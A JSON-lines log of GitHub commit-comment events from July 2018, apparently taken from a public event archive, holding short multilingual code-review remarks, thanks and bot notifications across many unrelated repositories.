{"id":"8008379869","type":"CommitCommentEvent","actor":{"login":"vityagi"},"repo":{"name":"bpramod/azure-linux-extensions"},"payload":{"comment":{"id":29810190,"position":null,"line":null,"path":null,"commit_id":"87e3561dce773a7c59c7aa31df831d06825d5816","created_at":"2018-07-24T07:39:17Z","updated_at":"2018-07-24T07:39:17Z","author_association":"NONE","body":"Looks good"}},"created_at":"2018-07-24T07:39:17Z"}
{"id":"8008384657","type":"CommitCommentEvent","actor":{"login":"vanissoft"},"repo":{"name":"vanissoft/DEXhub"},"payload":{"comment":{"id":29810201,"position":null,"line":null,"path":null,"commit_id":"0103d96b36e360987878fe8f6bd7b8a65dfd3002","created_at":"2018-07-24T07:40:23Z","updated_at":"2018-07-24T07:40:23Z","author_association":"OWNER","body":"Happy to see you again Marko.\r\n"}},"created_at":"2018-07-24T07:40:23Z"}
{"id":"8008385989","type":"CommitCommentEvent","actor":{"login":"TomasKorbar"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29810202,"position":32,"line":32,"path":"tests/hardware/test_inventory.py","commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-24T07:40:42Z","updated_at":"2018-07-24T07:40:42Z","author_association":"OWNER","body":"Ok. Dropped it in https://github.com/TomasKorbar/tuned/commit/64b1267beaad20affca6facf2d58e100625945ee"}},"created_at":"2018-07-24T07:40:42Z"}
{"id":"8008386241","type":"CommitCommentEvent","actor":{"login":"delin-au"},"repo":{"name":"delin-au/twitter-feed"},"payload":{"comment":{"id":29810203,"position":null,"line":null,"path":null,"commit_id":"921d732d1b9438e07385bdf7acf25aaa31f008de","created_at":"2018-07-24T07:40:46Z","updated_at":"2018-07-24T07:40:46Z","author_association":"OWNER","body":"np"}},"created_at":"2018-07-24T07:40:46Z"}
{"id":"8008389548","type":"CommitCommentEvent","actor":{"login":"meletios"},"repo":{"name":"HedvigInsurance/back-office"},"payload":{"comment":{"id":29810212,"position":13,"line":57,"path":"src/main/java/com/hedvig/backoffice/services/product_pricing/ProductPricingClient.java","commit_id":"743d43f988e3da3e9d7b87e13437bc1dccc87cfd","created_at":"2018-07-24T07:41:30Z","updated_at":"2018-07-24T07:41:30Z","author_association":"CONTRIBUTOR","body":"forgot to close the bracket \"&month={month\""}},"created_at":"2018-07-24T07:41:30Z"}
{"id":"8008391824","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"fangfufu/httpdirfs"},"payload":{"comment":{"id":29810219,"position":480,"line":625,"path":"network.c","commit_id":"bfceba8e1bd58ee134b6deb63a1fa24cc63b62cc","created_at":"2018-07-24T07:42:03Z","updated_at":"2018-07-24T07:42:03Z","author_association":"NONE","body":"Can it be that such a return value check does not fit to the wording “memory leak” in the commit subject?"}},"created_at":"2018-07-24T07:42:03Z"}
{"id":"8008391889","type":"CommitCommentEvent","actor":{"login":"nhajinazar"},"repo":{"name":"CMU-SAFARI/ramulator"},"payload":{"comment":{"id":29810220,"position":null,"line":null,"path":null,"commit_id":"c7a4f37ac6ef01cf56a53ef764df1e9159a85de0","created_at":"2018-07-24T07:42:04Z","updated_at":"2018-07-24T07:42:04Z","author_association":"NONE","body":"I fixed it for my self but expected_limit_insts=0 is supposed to be the\ndefault, so it should work without setting it to zero in the config file\n(similar to how we have used Ramulator before). With the current version,\nif someone assumes the value 0 for the expected_limit_insts as the default\nvalue based on the Config.h, then they will end up with an infinite loop in\nthe simulation using cache-unfiltered traces.\n\n\n\nOn Tue, Jul 24, 2018 at 12:27 AM, arthasSin <notifications@github.com>\nwrote:\n\n> Have you tried setting expected_limit_insts=0 in your config file? It\n> should solve the problem.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CMU-SAFARI/ramulator/commit/c7a4f37ac6ef01cf56a53ef764df1e9159a85de0#commitcomment-29810037>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEtsMT_WTjVV16OPZPYfyeK7JROuJ7NBks5uJsxjgaJpZM4Vb-as>\n> .\n>\n"}},"created_at":"2018-07-24T07:42:04Z"}
{"id":"8008392629","type":"CommitCommentEvent","actor":{"login":"anarisada"},"repo":{"name":"anarisada/nagoya-city"},"payload":{"comment":{"id":29810221,"position":null,"line":null,"path":null,"commit_id":"4952bab311448ff5eb3ac6dc63e218944c134ce6","created_at":"2018-07-24T07:42:13Z","updated_at":"2018-07-24T07:42:13Z","author_association":"OWNER","body":"https://www.mhlw.go.jp/file/06-Seisakujouhou-11300000-Roudoukijunkyokuanzeneiseibu/0000153859.pdf"}},"created_at":"2018-07-24T07:42:13Z"}
{"id":"8008395215","type":"CommitCommentEvent","actor":{"login":"Jcstack"},"repo":{"name":"Jcstack/jx1"},"payload":{"comment":{"id":29810227,"position":null,"line":null,"path":null,"commit_id":"47641f3753272f2c1c5d4ec47bb0045f94d1569b","created_at":"2018-07-24T07:42:48Z","updated_at":"2018-07-24T07:42:48Z","author_association":"OWNER","body":"nihao  wozai zheli  genggai "}},"created_at":"2018-07-24T07:42:48Z"}
{"id":"8008397304","type":"CommitCommentEvent","actor":{"login":"palite"},"repo":{"name":"muhabibull/masbay-backend"},"payload":{"comment":{"id":29810237,"position":null,"line":null,"path":null,"commit_id":"942e68f63a5cbb5dc7114c9db9f6e5a590be9a5b","created_at":"2018-07-24T07:43:18Z","updated_at":"2018-07-24T07:43:18Z","author_association":"COLLABORATOR","body":"makasih habib"}},"created_at":"2018-07-24T07:43:18Z"}
{"id":"8008398764","type":"CommitCommentEvent","actor":{"login":"cire831"},"repo":{"name":"tinyos/tinyos-main"},"payload":{"comment":{"id":29810242,"position":null,"line":null,"path":null,"commit_id":"ad056121cc51c449d6de154d98604e2c167dbfd8","created_at":"2018-07-24T07:43:39Z","updated_at":"2018-07-24T07:43:39Z","author_association":"MEMBER","body":"what does complete mean?\n\nby that what are you expecting when installing TinyOS on Ubuntu 18.04?\n\n\nOn Fri, Jul 6, 2018 at 12:19 AM, anitaSpatil <notifications@github.com>\nwrote:\n\n> Dear Sir,\n> Earlier around a year back I installed TinyOS-2.1.2 along with Eclipse and\n> supporting Yeti 2 plugins, But now I am not getting Yeti 2 as well ashttp:\n> //tinyos.net website. As I can see now there is a new version 3, Please\n> guide me how to install the complete TinyOS on Ubuntu 18.04 LTS.\n>\n> Thanking you\n> Anita S Patil\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tinyos/tinyos-main/commit/ad056121cc51c449d6de154d98604e2c167dbfd8#commitcomment-29617449>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAY46YtZdq1TO9LO65fTnrhTDtb65mEeks5uDw9tgaJpZM4VE_tW>\n> .\n>\n\n\n\n-- \nEric B. Decker\nSenior (over 50 :-) Researcher\n"}},"created_at":"2018-07-24T07:43:39Z"}
{"id":"8008401696","type":"CommitCommentEvent","actor":{"login":"Diencv"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810249,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T07:44:19Z","updated_at":"2018-07-24T07:44:19Z","author_association":"NONE","body":"like it"}},"created_at":"2018-07-24T07:44:19Z"}
{"id":"8008406010","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29810269,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-24T07:45:16Z","updated_at":"2018-07-24T07:45:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T07:45:16Z"}
{"id":"8008414068","type":"CommitCommentEvent","actor":{"login":"R41z0r"},"repo":{"name":"R41z0r/Woocommerce_Module"},"payload":{"comment":{"id":29810285,"position":null,"line":null,"path":null,"commit_id":"c92a418d99c6a0bbe62c5272b9a9af417b23005c","created_at":"2018-07-24T07:47:02Z","updated_at":"2018-07-24T07:47:02Z","author_association":"OWNER","body":"#10 "}},"created_at":"2018-07-24T07:47:02Z"}
{"id":"8008414258","type":"CommitCommentEvent","actor":{"login":"therealaldo"},"repo":{"name":"therealaldo/templates"},"payload":{"comment":{"id":29810286,"position":null,"line":null,"path":null,"commit_id":"3d9221fafb64446929b8c0b348a10fed5c9175b1","created_at":"2018-07-24T07:47:05Z","updated_at":"2018-07-24T07:47:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update Trello docs w/ grooming session info](https://trello.com/c/aISYL77O/51-update-trello-docs-w-grooming-session-info)"}},"created_at":"2018-07-24T07:47:05Z"}
{"id":"8008416640","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Community-Dark"},"payload":{"comment":{"id":29810290,"position":null,"line":null,"path":null,"commit_id":"d356b181dda2aa6e4c242f92c676bbdb7ac47af0","created_at":"2018-07-24T07:47:37Z","updated_at":"2018-07-24T07:47:37Z","author_association":"COLLABORATOR","body":"```css\r\n  .lia-list-row-float .triangletop:before,\r\n  .lia-list-row-thread-readonly .triangletop:before\r\n```\r\n@Mottie  these are blue triangles in the top right, would it be better rather than using base-color  (as I did here) to actually use default blue `#4183c4` from GHD?"}},"created_at":"2018-07-24T07:47:37Z"}
{"id":"8008422929","type":"CommitCommentEvent","actor":{"login":"vlachep"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810304,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T07:49:05Z","updated_at":"2018-07-24T07:49:05Z","author_association":"NONE","body":"Good luck with your project! "}},"created_at":"2018-07-24T07:49:05Z"}
{"id":"8008423495","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29810305,"position":35,"line":26,"path":"compiler/testData/compileKotlinAgainstCustomBinaries/experimentalCoroutineCallFromRelease/output.txt","commit_id":"39c912ae270dd8f04db4129f8479800e35b89c47","created_at":"2018-07-24T07:49:12Z","updated_at":"2018-07-24T07:49:12Z","author_association":"MEMBER","body":"I'd say \"Experimental coroutines API\" at least"}},"created_at":"2018-07-24T07:49:12Z"}
{"id":"8008424110","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29810307,"position":null,"line":null,"path":null,"commit_id":"e01e4b41c1c48cb6c086913e6c4bd5b0d3c47e63","created_at":"2018-07-24T07:49:20Z","updated_at":"2018-07-24T07:49:20Z","author_association":"MEMBER","body":"If it's only applications, then that is indeed possible. Python 3 is the preferred option I would say :)\r\n\r\nAnyway, it might be nice before 18.09 to start using `python3` explicitly in as many places as possible."}},"created_at":"2018-07-24T07:49:20Z"}
{"id":"8008424576","type":"CommitCommentEvent","actor":{"login":"fikrihasani"},"repo":{"name":"fikrihasani/imigrasi"},"payload":{"comment":{"id":29810309,"position":null,"line":null,"path":null,"commit_id":"be29197579f8676dfa267688ea388b9e29ff5a4a","created_at":"2018-07-24T07:49:25Z","updated_at":"2018-07-24T07:49:25Z","author_association":"OWNER","body":"itu yang galery mau dibikin gimana? bisa upload multiple picture gitu? \r\nTerus yang buat halaman berita fetch aja dari database mas @styusuf13 "}},"created_at":"2018-07-24T07:49:25Z"}
{"id":"8008428706","type":"CommitCommentEvent","actor":{"login":"PhilippeBo"},"repo":{"name":"Nikvt/Articles-front-for-api"},"payload":{"comment":{"id":29810320,"position":12,"line":12,"path":"spec/interactors/mail_to_comment_receiver_spec.rb","commit_id":"45e97261505e26ddcb046ae16b566a1f6408855e","created_at":"2018-07-24T07:50:19Z","updated_at":"2018-07-24T07:50:19Z","author_association":"NONE","body":"On regarde à cela tout à l'heure !\r\nNormalement meme les `\"\"` sont pas nécéssaire : \r\n```\r\nlet(:comment) { {\r\n   attributes: {\r\n       content: \"sDFESFSE\",\r\n       user_name: \"Nikolay Terekhov\",\r\n       user_email: \"nikvt@mail.ru\"\r\n   }\r\n}\r\n```\r\nEt dans ton test, tu dois faire : comment.to_json du coup !"}},"created_at":"2018-07-24T07:50:19Z"}
{"id":"8008430000","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29810322,"position":24,"line":37,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/descriptors/DeserializedMemberDescriptor.kt","commit_id":"39c912ae270dd8f04db4129f8479800e35b89c47","created_at":"2018-07-24T07:50:34Z","updated_at":"2018-07-24T07:50:34Z","author_association":"MEMBER","body":"I'd try to make it a val (at least in the public API surface) that is being initialized within `initialize` call"}},"created_at":"2018-07-24T07:50:34Z"}
{"id":"8008433615","type":"CommitCommentEvent","actor":{"login":"cam900"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29810329,"position":null,"line":null,"path":null,"commit_id":"32506931717a6c4da8cd0266d463adb772ce1d7f","created_at":"2018-07-24T07:51:22Z","updated_at":"2018-07-24T07:51:22Z","author_association":"CONTRIBUTOR","body":"It's value type issue, I fixed in PR."}},"created_at":"2018-07-24T07:51:22Z"}
{"id":"8008435185","type":"CommitCommentEvent","actor":{"login":"laixinwudi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810333,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T07:51:42Z","updated_at":"2018-07-24T07:51:42Z","author_association":"NONE","body":"like it"}},"created_at":"2018-07-24T07:51:42Z"}
{"id":"8008440251","type":"CommitCommentEvent","actor":{"login":"Thunder33345"},"repo":{"name":"Saini14/PiggyCustomEnchantsDisabler"},"payload":{"comment":{"id":29810342,"position":null,"line":null,"path":null,"commit_id":"14687ecc7b5ee69a936a902dd40f141a27c0145e","created_at":"2018-07-24T07:52:48Z","updated_at":"2018-07-24T07:52:48Z","author_association":"NONE","body":"Dear @Saini14:\nI regret to inform you that the release you submitted, named \"**Enchantments_Disabler**\" (v1.0.0), for the project [Enchantments-Disabler](https://poggit.pmmp.io/ci/Saini14/PiggyCustomEnchantsDisabler/Enchantments-Disabler) on 2018-07-23T15:19:15.000Z, has been rejected.\n\nYour issues we discussed has been fixed on the new update\nplease submit it\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-24T07:52:48Z"}
{"id":"8008440314","type":"CommitCommentEvent","actor":{"login":"jalvz"},"repo":{"name":"elastic/beats"},"payload":{"comment":{"id":29810343,"position":4,"line":28,"path":"CHANGELOG-developer.asciidoc","commit_id":"540674572fbb5bf96021c5043412d5106c8f0df4","created_at":"2018-07-24T07:52:49Z","updated_at":"2018-07-24T07:52:49Z","author_association":"CONTRIBUTOR","body":"@andrewkroh @ruflin this also applies to apm-server, right?\r\nwill it make it to 6.4?"}},"created_at":"2018-07-24T07:52:49Z"}
{"id":"8008440588","type":"CommitCommentEvent","actor":{"login":"yyhuu"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29810344,"position":null,"line":null,"path":null,"commit_id":"01b7b7c6eafeeccade1b298a8b9c3fa010b2ec56","created_at":"2018-07-24T07:52:52Z","updated_at":"2018-07-24T07:52:52Z","author_association":"NONE","body":"客户发售的代币"}},"created_at":"2018-07-24T07:52:52Z"}
{"id":"8008444043","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29810349,"position":null,"line":null,"path":null,"commit_id":"01a63f8b4b3d193ecf9d25a8f7a0365c2902f0aa","created_at":"2018-07-24T07:53:35Z","updated_at":"2018-07-24T07:53:35Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/cleaning-up-e-mail-logs/39132/21\n"}},"created_at":"2018-07-24T07:53:35Z"}
{"id":"8008444079","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29810350,"position":null,"line":null,"path":null,"commit_id":"ae8b0a517ffda0bb57a67bb9773bfb441181dcee","created_at":"2018-07-24T07:53:35Z","updated_at":"2018-07-24T07:53:35Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/cleaning-up-e-mail-logs/39132/21\n"}},"created_at":"2018-07-24T07:53:35Z"}
{"id":"8008444114","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29810351,"position":null,"line":null,"path":null,"commit_id":"fad9c2b97113ddbac16d968c38edb7ab47aa8eb9","created_at":"2018-07-24T07:53:36Z","updated_at":"2018-07-24T07:53:36Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/cleaning-up-e-mail-logs/39132/21\n"}},"created_at":"2018-07-24T07:53:36Z"}
{"id":"8008447912","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29810357,"position":87,"line":87,"path":"lesson_3/railroad.rb","commit_id":"5c54049819e2496830a314c2d2cf37c233ee59df","created_at":"2018-07-24T07:54:25Z","updated_at":"2018-07-24T07:54:25Z","author_association":"NONE","body":"Этот метод лучше разбить на 2, без action"}},"created_at":"2018-07-24T07:54:25Z"}
{"id":"8008453316","type":"CommitCommentEvent","actor":{"login":"dirbz"},"repo":{"name":"arbi316/MSBT"},"payload":{"comment":{"id":29810370,"position":null,"line":null,"path":null,"commit_id":"543f21a23c9400cfc77bc4dc7208dc3d36863ad8","created_at":"2018-07-24T07:55:34Z","updated_at":"2018-07-24T07:55:34Z","author_association":"NONE","body":"Crits still aren't sticking to their frame. I can't figure out why. "}},"created_at":"2018-07-24T07:55:34Z"}
{"id":"8008453982","type":"CommitCommentEvent","actor":{"login":"masonkoh"},"repo":{"name":"git/git"},"payload":{"comment":{"id":29810372,"position":1,"line":1,"path":"Makefile","commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2018-07-24T07:55:42Z","updated_at":"2018-07-24T07:55:42Z","author_association":"NONE","body":"Hello world!"}},"created_at":"2018-07-24T07:55:42Z"}
{"id":"8008454464","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29810373,"position":107,"line":107,"path":"lesson_3/railroad.rb","commit_id":"5c54049819e2496830a314c2d2cf37c233ee59df","created_at":"2018-07-24T07:55:48Z","updated_at":"2018-07-24T07:55:48Z","author_association":"NONE","body":"если вдруг previous_station будет nil, то будет ошибка\r\nundefined method take_trains for Nil class\r\n\r\nаналогично go_next\r\n\r\ngo_next\r\ngo_to_previous - надо дать методам однообразные названия\r\nили с to, или без"}},"created_at":"2018-07-24T07:55:48Z"}
{"id":"8008455328","type":"CommitCommentEvent","actor":{"login":"masonkoh"},"repo":{"name":"git/git"},"payload":{"comment":{"id":29810376,"position":null,"line":null,"path":null,"commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2018-07-24T07:55:58Z","updated_at":"2018-07-24T07:55:58Z","author_association":"NONE","body":"Hello, World! from 2018"}},"created_at":"2018-07-24T07:55:58Z"}
{"id":"8008456499","type":"CommitCommentEvent","actor":{"login":"kaneko"},"repo":{"name":"TakuKaneko/cap"},"payload":{"comment":{"id":29810383,"position":null,"line":null,"path":null,"commit_id":"f2b023d425e933e807413151a3c3bcc064df748b","created_at":"2018-07-24T07:56:12Z","updated_at":"2018-07-24T07:56:12Z","author_association":"NONE","body":"先日から通知が来て迷惑なので、私にメンションを飛ばすのやめていただけないでしょうか。"}},"created_at":"2018-07-24T07:56:12Z"}
{"id":"8008457289","type":"CommitCommentEvent","actor":{"login":"SanLuca36"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810386,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T07:56:21Z","updated_at":"2018-07-24T07:56:21Z","author_association":"NONE","body":"Looking forward to it"}},"created_at":"2018-07-24T07:56:21Z"}
{"id":"8008460673","type":"CommitCommentEvent","actor":{"login":"olysonek"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29810393,"position":41,"line":47,"path":"tests/hardware/test_inventory.py","commit_id":"64b1267beaad20affca6facf2d58e100625945ee","created_at":"2018-07-24T07:57:03Z","updated_at":"2018-07-24T07:57:03Z","author_association":"NONE","body":"IMHO, this sequence defeats the purpose of creating two instances of the DummyPlugin class. What I would do is unsubscribe dummy and test that `dummy.Testcallback()` does *not* get called and test that `dummier.TestCallback()` still does get called. Then unsubscribe dummier and test that neither callback gets called."}},"created_at":"2018-07-24T07:57:03Z"}
{"id":"8008463597","type":"CommitCommentEvent","actor":{"login":"ysruohan"},"repo":{"name":"jorvis/Attributor"},"payload":{"comment":{"id":29810398,"position":null,"line":null,"path":null,"commit_id":"9f7bbf05451dd1b4f7b10ad4c79e7aa8769abeb5","created_at":"2018-07-24T07:57:40Z","updated_at":"2018-07-24T07:57:40Z","author_association":"NONE","body":"9f7bbf05451dd1b4f7b10ad4c79e7aa8769abeb5"}},"created_at":"2018-07-24T07:57:40Z"}
{"id":"8008466125","type":"CommitCommentEvent","actor":{"login":"Andreyco"},"repo":{"name":"jaredpalmer/formik"},"payload":{"comment":{"id":29810405,"position":null,"line":null,"path":null,"commit_id":"e0ab364959f7c27d6a6e727bc705cc5f9c926825","created_at":"2018-07-24T07:58:11Z","updated_at":"2018-07-24T07:58:11Z","author_association":"COLLABORATOR","body":"This validations probably need updated test to cover this ;)"}},"created_at":"2018-07-24T07:58:11Z"}
{"id":"8008472336","type":"CommitCommentEvent","actor":{"login":"NE-SmallTown"},"repo":{"name":"JsAaron/webpack4-vue2-template"},"payload":{"comment":{"id":29810414,"position":15,"line":10,"path":"config/index.js","commit_id":"28ed39d735b72c096a69b50dd52302ec03e37ae6","created_at":"2018-07-24T07:59:32Z","updated_at":"2018-07-24T07:59:32Z","author_association":"NONE","body":"这里是不改用 `rootPath `"}},"created_at":"2018-07-24T07:59:32Z"}
{"id":"8008473029","type":"CommitCommentEvent","actor":{"login":"Rogeritacademy"},"repo":{"name":"Rogeritacademy/hackaton"},"payload":{"comment":{"id":29810415,"position":null,"line":null,"path":null,"commit_id":"1f08c8a8b45cd98a85d6dd818c57782f604682fc","created_at":"2018-07-24T07:59:40Z","updated_at":"2018-07-24T07:59:40Z","author_association":"OWNER","body":"Prueba basada en el diseño de Andrés.\r\nTesteando librerias para front: materialize y anime.js"}},"created_at":"2018-07-24T07:59:40Z"}
{"id":"8008479127","type":"CommitCommentEvent","actor":{"login":"abhimrawks"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":29810444,"position":10,"line":1323,"path":"packages/react-reconciler/src/__tests__/ReactSuspense-test.internal.js","commit_id":"ca0941fce3a03592530f6111f77cbc9c0daf79af","created_at":"2018-07-24T08:00:51Z","updated_at":"2018-07-24T08:00:51Z","author_association":"NONE","body":"kmkmk"}},"created_at":"2018-07-24T08:00:51Z"}
{"id":"8008481269","type":"CommitCommentEvent","actor":{"login":"tbaddade"},"repo":{"name":"FriendsOfREDAXO/redactor2"},"payload":{"comment":{"id":29810448,"position":null,"line":null,"path":null,"commit_id":"92f02ef75b27731db603dd6d91bd5731ebe13f93","created_at":"2018-07-24T08:01:16Z","updated_at":"2018-07-24T08:01:16Z","author_association":"MEMBER","body":"Verstehe die Änderung nicht. Die Cachedatei heißt hier `redactor2_profiles.js`. Version 3.4.5\r\n\r\nAuch wenn die GH Version auf Sprachen umgestellt wurde, dürfte das Problem damit nicht gelöst sein."}},"created_at":"2018-07-24T08:01:16Z"}
{"id":"8008493575","type":"CommitCommentEvent","actor":{"login":"ruflin"},"repo":{"name":"elastic/beats"},"payload":{"comment":{"id":29810463,"position":4,"line":28,"path":"CHANGELOG-developer.asciidoc","commit_id":"540674572fbb5bf96021c5043412d5106c8f0df4","created_at":"2018-07-24T08:03:39Z","updated_at":"2018-07-24T08:03:39Z","author_association":"COLLABORATOR","body":"@jalvz yes and yes."}},"created_at":"2018-07-24T08:03:39Z"}
{"id":"8008494322","type":"CommitCommentEvent","actor":{"login":"ebsuku"},"repo":{"name":"ebsuku/python3-qoqa"},"payload":{"comment":{"id":29810464,"position":null,"line":null,"path":null,"commit_id":"e88290c709c958efb89832611990ab45f1a124ea","created_at":"2018-07-24T08:03:48Z","updated_at":"2018-07-24T08:03:48Z","author_association":"OWNER","body":"This should be fixed, think I did not upload the changes previously. "}},"created_at":"2018-07-24T08:03:48Z"}
{"id":"8008496180","type":"CommitCommentEvent","actor":{"login":"WebMad"},"repo":{"name":"WebMad/newspaperMM"},"payload":{"comment":{"id":29810471,"position":86,"line":168,"path":"application/controllers/Panel.php","commit_id":"888d0c56807108078ce703ec37eb505a17b7bb54","created_at":"2018-07-24T08:04:12Z","updated_at":"2018-07-24T08:04:12Z","author_association":"OWNER","body":"Я понял, что такая реализация уж слишком плоха, поэтому будем переписывать и рефакторить"}},"created_at":"2018-07-24T08:04:12Z"}
{"id":"8008497383","type":"CommitCommentEvent","actor":{"login":"ahmedradaideh"},"repo":{"name":"nathanchance/android-kernel-clang"},"payload":{"comment":{"id":29810472,"position":20,"line":79,"path":"README.md","commit_id":"f26bf4c3a9b96e47e59c6a0dc7af46940e584a55","created_at":"2018-07-24T08:04:26Z","updated_at":"2018-07-24T08:04:26Z","author_association":"NONE","body":"Hi Nathan\r\nActually Snapdragon 845."}},"created_at":"2018-07-24T08:04:26Z"}
{"id":"8008502210","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29810483,"position":19,"line":19,"path":"Lesson2/purchases_sum.rb","commit_id":"5a68ec6f8685cb404d490890d26b72bb0428ee0a","created_at":"2018-07-24T08:05:28Z","updated_at":"2018-07-24T08:05:28Z","author_association":"NONE","body":"Так тоже можно. Я искал, что-то типа ```puts \"#{product_name} something #{total}\". Можно двигаться дальше"}},"created_at":"2018-07-24T08:05:28Z"}
{"id":"8008506091","type":"CommitCommentEvent","actor":{"login":"icstglobal"},"repo":{"name":"icstglobal/go-icst"},"payload":{"comment":{"id":29810490,"position":4,"line":24,"path":"chain/provider.go","commit_id":"fd561b0fa919f02c7f07d92b182dbac44ba16ddb","created_at":"2018-07-24T08:06:15Z","updated_at":"2018-07-24T08:06:15Z","author_association":"OWNER","body":"为什么需要private key？"}},"created_at":"2018-07-24T08:06:15Z"}
{"id":"8008514730","type":"CommitCommentEvent","actor":{"login":"arthasSin"},"repo":{"name":"CMU-SAFARI/ramulator"},"payload":{"comment":{"id":29810504,"position":null,"line":null,"path":null,"commit_id":"c7a4f37ac6ef01cf56a53ef764df1e9159a85de0","created_at":"2018-07-24T08:08:06Z","updated_at":"2018-07-24T08:08:06Z","author_association":"MEMBER","body":"It would be great if you can commit your fix."}},"created_at":"2018-07-24T08:08:06Z"}
{"id":"8008515633","type":"CommitCommentEvent","actor":{"login":"duguyitian"},"repo":{"name":"duguyitian/NeverGiveUp"},"payload":{"comment":{"id":29810507,"position":null,"line":null,"path":null,"commit_id":"89b0f7bb47f9ece938a9b10467f1b5a3cedc97c4","created_at":"2018-07-24T08:08:17Z","updated_at":"2018-07-24T08:08:17Z","author_association":"OWNER","body":"Maybe lots of difficulties exist, should I do it as usual!"}},"created_at":"2018-07-24T08:08:17Z"}
{"id":"8008516246","type":"CommitCommentEvent","actor":{"login":"thinhnguyen82"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810509,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T08:08:24Z","updated_at":"2018-07-24T08:08:24Z","author_association":"NONE","body":"a promising project"}},"created_at":"2018-07-24T08:08:24Z"}
{"id":"8008517419","type":"CommitCommentEvent","actor":{"login":"Rader"},"repo":{"name":"icstglobal/go-icst"},"payload":{"comment":{"id":29810510,"position":4,"line":24,"path":"chain/provider.go","commit_id":"fd561b0fa919f02c7f07d92b182dbac44ba16ddb","created_at":"2018-07-24T08:08:40Z","updated_at":"2018-07-24T08:08:40Z","author_association":"COLLABORATOR","body":"should not include private key, but generate a transaction to be signed by account owner later"}},"created_at":"2018-07-24T08:08:40Z"}
